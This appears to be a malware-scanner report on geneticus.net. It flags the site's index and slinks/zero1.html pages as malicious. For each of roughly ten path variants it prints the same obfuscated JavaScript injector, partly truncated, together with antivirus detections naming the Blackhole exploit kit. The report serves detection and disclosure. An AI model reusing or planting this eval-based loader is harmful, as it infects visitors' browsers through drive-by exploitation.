Request | Server response | Status |
http://geneticus.net/ | 200 OK Content-Length: 14631 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/zero1.html | 200 OK Content-Length: 10328 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../index.html | 200 OK Content-Length: 14631 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/zero1.html | 200 OK Content-Length: 10328 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/../index.html | 200 OK Content-Length: 14631 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/../slinks/zero1.html | 200 OK Content-Length: 10328 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/../slinks/../index.html | 200 OK Content-Length: 14631 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/../slinks/../slinks/zero1.html | 200 OK Content-Length: 10328 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/../slinks/../slinks/../index.html | 200 OK Content-Length: 14631 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/../slinks/../slinks/../slinks/zero1.html | 200 OK Content-Length: 10328 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/../slinks/../slinks/../slinks/../index.html | 200 OK Content-Length: 14631 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) itpb="y";qgevx="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[qgevx].getElementById("asd"))}()}catch(odhl){hpcj=function(wgj){wgj="fro"+wgj;for(qbwcnl=0;qbwcnl<itpb.length;qbwcnl++){ewmcr+=String[wgj](bqd(anqe+(itpb[qbwcnl]))-(40));}};};bqd=(window.eval);anqe="0x";kgfi=0;if(!kgfi){try{++bqd(qgevx)["\x62o"+"d"+itpb]}catch(odhl){jnu="^";}itpb="48^8e^9d^96^8b^9c^91^97^96^48^9b^9b^96^58^61^50^51^48^a3^35^32^48^9e^89^9a^48^9b^9c^89^9c^91^8b^65^4f^89^92^89^a0^4f^63^35^32
... 3641 bytes are skipped ...0^48^94^8d^96^54^48^8d^96^8c^48^51^48^51^63^35^32^a5^35^32^91^8e^48^50^96^89^9e^91^8f^89^9c^97^9a^56^8b^97^97^93^91^8d^6d^96^89^8a^94^8d^8c^51^35^32^a3^35^32^91^8e^50^6f^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^51^65^65^5d^5d^51^a3^a5^8d^94^9b^8d^a3^7b^8d^9c^6b^97^97^93^91^8d^50^4f^9e^91^9b^91^9c^8d^8c^87^9d^99^4f^54^48^4f^5d^5d^4f^54^48^4f^59^4f^54^48^4f^57^4f^51^63^35^32^35^32^9b^9b^96^58^61^50^51^63^35^32^a5^35^32^a5".split(jnu);ewmcr="";hpcj("mCharCode");bqd(""+ewmcr);}Antivirus reports:- AntiVir
- HTML/ExpKit.Gen5
- Avast
- JS:Includer-AUU [Trj]
- Ad-Aware
- JS:Exploit.BlackHole.PG
- Ikarus
- Exploit.JS.Blacole
- nProtect
- JS:Exploit.BlackHole.PG
- TrendMicro-HouseCall
- TROJ_GEN.F47V1230
- Emsisoft
- JS:Exploit.BlackHole.PG (B)
- Comodo
- UnclassifiedMalware
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- Microsoft
- Exploit:JS/Blacole.OF
- MicroWorld-eScan
- JS:Exploit.BlackHole.PG
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.gc
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Exploit.BlackHole.PG
- VIPRE
- Exploit.JS.Blacole.of (v)
- AVG
- JS/Exploit
- Norman
- Blacole.WV
- GData
- JS:Exploit.BlackHole.PG
- BitDefender
- JS:Exploit.BlackHole.PG
|
http://geneticus.net/slinks/../slinks/../slinks/../slinks/../slinks/../slinks/zero1.html | 200 OK Content-Length: 10328 Content-Type: text/html | malicious |
